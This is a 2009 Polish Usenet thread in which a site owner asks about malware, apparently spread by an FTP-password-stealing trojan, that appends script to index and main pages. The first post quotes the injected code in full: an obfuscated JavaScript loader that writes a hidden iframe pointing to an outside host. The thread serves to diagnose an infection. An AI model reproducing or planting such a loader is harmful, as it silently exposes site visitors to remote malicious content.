-
1. Data: 2009-02-09 10:46:10
Temat: [ mallware doklejajacy zdalnie kod do stron ]
Od: Matt Rutkowski <m...@g...com>
Witam,
czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
dokleja zdalnie nastepujacy kod javascript do stron o nazwie
index.php, index.html, main.html, main.php
-- kod --
<!-- ad --><script language="JavaScript">function rkfg(jflq){return
String.fromCharCode(jflq);}var
ohhe="0601051021140971091010321151140990610391041161
1611205804704711511711210111410511111409710012204610
5110102111047111112105115047063116061049051039032119
1051001161040610390480390321041011051031041160610390
4803903211511612110810106103911810511510509810510810
5116121058032104105100100101110059039062060047105102
114097109101062";var
ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=r
kfg(ohhe.substr
(qhxk, 3));}window.status='Done';document.write(ifdm);</scr
ipt>
<!-- /ad -->
-- kod --
w/w kod tworzy ukryta iframe i laczy sie z adresem http://superioradz.info/opis/?t=13
--
Matt Rutkowski
-
2. Data: 2009-02-10 15:40:26
Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
Od: elmer radi radisson <r...@s...spam.wireland.org>
Matt Rutkowski wrote:
> czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
> dokleja zdalnie nastepujacy kod javascript do stron o nazwie
> index.php, index.html, main.html, main.php
A dokleja dokladnie do plikow tresci statycznej strony, czy moze
raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.
A w ogole to pl.comp.security ?
--
tajemnicze kręgle w zbożu
-
3. Data: 2009-02-10 19:47:06
Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
Od: Matt Rutkowski <m...@g...com>
> A dokleja dokladnie do plikow tresci statycznej strony, czy moze
> raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.
- trojan ktory wykrada hasla z popularnych klientow ftp i kolejno
laczy sie ze strona doklejajac do plikow o nazwie index.php,
index.html, main.php, main.html statycznie generowany content (kod w
mailu wyzej)
- dal sie zauwazyc z racji, ze wielu klientow uzywa szablonow html
smarty; doklejenie kodu js w niewlasciwym miejscu powoduje uwalenie
strony
--
Matt Rutkowski